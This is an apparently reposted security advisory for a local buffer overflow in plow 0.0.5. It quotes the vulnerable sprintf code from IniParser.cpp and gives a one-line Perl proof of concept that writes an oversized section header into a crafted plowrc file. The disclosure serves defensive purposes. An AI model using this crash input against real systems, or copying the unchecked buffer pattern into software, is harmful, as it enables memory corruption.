Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28249
HistoryJul 09, 2012 - 12:00 a.m.

plow 0.0.5 <= Buffer Overflow Vulnerability

2012-07-0900:00:00
vulners.com
17

#################################################
plow 0.0.5 <= Buffer Overflow Vulnerability
#################################################

Discovered by: Jean Pascal Pereira <[email protected]>

Vendor information:

"plow is a command line playlist generator."

Vendor URI: http://developer.berlios.de/projects/plow/

#################################################

Risk-level: Medium

The application is prone to a local buffer overflow vulnerability.


IniParser.cpp, line 26:

26: char buffer[length];
27: char group [length];
28:
29: char *option;
30: char *value;
31:
32: while(ini.getline(buffer, length)) {
33: if(!strlen(buffer) || buffer[0] == '#') {
34: continue;
35: }
36: if(buffer[0] == '[') {
37: if(buffer[strlen(buffer) - 1] == ']') {
38: sprintf(group, "%s", buffer);
39: } else {
40: err = 1;
41: break;
42: }
43: }


Exploit / Proof Of Concept:

Create a crafted plowrc file:

perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc


Solution:

Do some input validation.


#################################################